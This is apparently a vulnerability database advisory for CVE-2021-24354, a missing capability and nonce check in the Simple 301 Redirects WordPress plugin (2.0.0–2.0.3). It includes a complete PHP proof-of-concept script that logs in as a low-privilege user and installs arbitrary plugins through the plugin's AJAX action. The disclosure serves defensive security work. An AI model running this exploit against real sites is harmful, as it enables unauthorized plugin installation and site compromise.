WordPress Plugin Vulnerabilities

Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Arbitrary Plugin Installation

Description

A lack of capability checks and insufficient nonce check on the AJAX action in the plugin, made it possible for authenticated users to install arbitrary plugins on vulnerable sites.

Proof of Concept

<?php

// Settings
$siteurl = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];

echo 'Logging in!';

// 1) Log in as subscriber+
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

echo 'Getting REST API Nonce!';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php?action=rest-nonce');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Rest Nonce
preg_match('/([^"]+)/', $content, $matches);
$restnonce = $matches[1];
echo $restnonce;

echo 'Installing Plugin!';
//Installing Plugin
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
    'action' => 'simple301redirects/admin/install_plugin',
    'security' => $restnonce,
    'slug' => 'jetpack',
] );
$output = curl_exec($ch);
curl_close($ch);
print($output)

?>

Affects Plugins

Plugin icon
simple-301-redirects
Fixed in 2.0.4

References

CVE
CVE-2021-24354
URL
https://www.wordfence.com/blog/2021/05/severe-vulnerabilities-patched-in-simple-301-redirects-by-betterlinks-plugin/

Classification

Type
ACCESS CONTROLS
OWASP top 10
A5: Broken Access Control
CWE
CWE-284
CVSS
7.4 (high)

Miscellaneous

Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
https://wordfence.com
Submitter twitter
infosecchloe
Verified
Yes
WPVDB ID
8638b36c-6641-491f-b9df-5db3645e4668

Timeline

Publicly Published
2021-05-26 (about 2 years ago)
Added
2021-05-26 (about 2 years ago)
Last Updated
2021-05-27 (about 2 years ago)

Other

Published
Title
Published
2017-11-02
Title
Like Button Rating < 2.5.4 - Unauthenticated Arbitrary Blog Settings Change
Published
2023-10-16
Title
Awesome Support < 6.1.5 - Reflected Cross-Site Scripting
Published
2022-02-11
Title
Email Subscribers & Newsletters < 5.3.2 - Unauthenticated arbitrary option update
Published
2021-10-05
Title
JobSearch WP Job Board < 1.8.2 - Subscriber+ Add/Update Schedule Calls
Published
2021-07-12
Title
Frontend File Manager < 18.3 - Unauthenticated Post Meta Change to Arbitrary File Download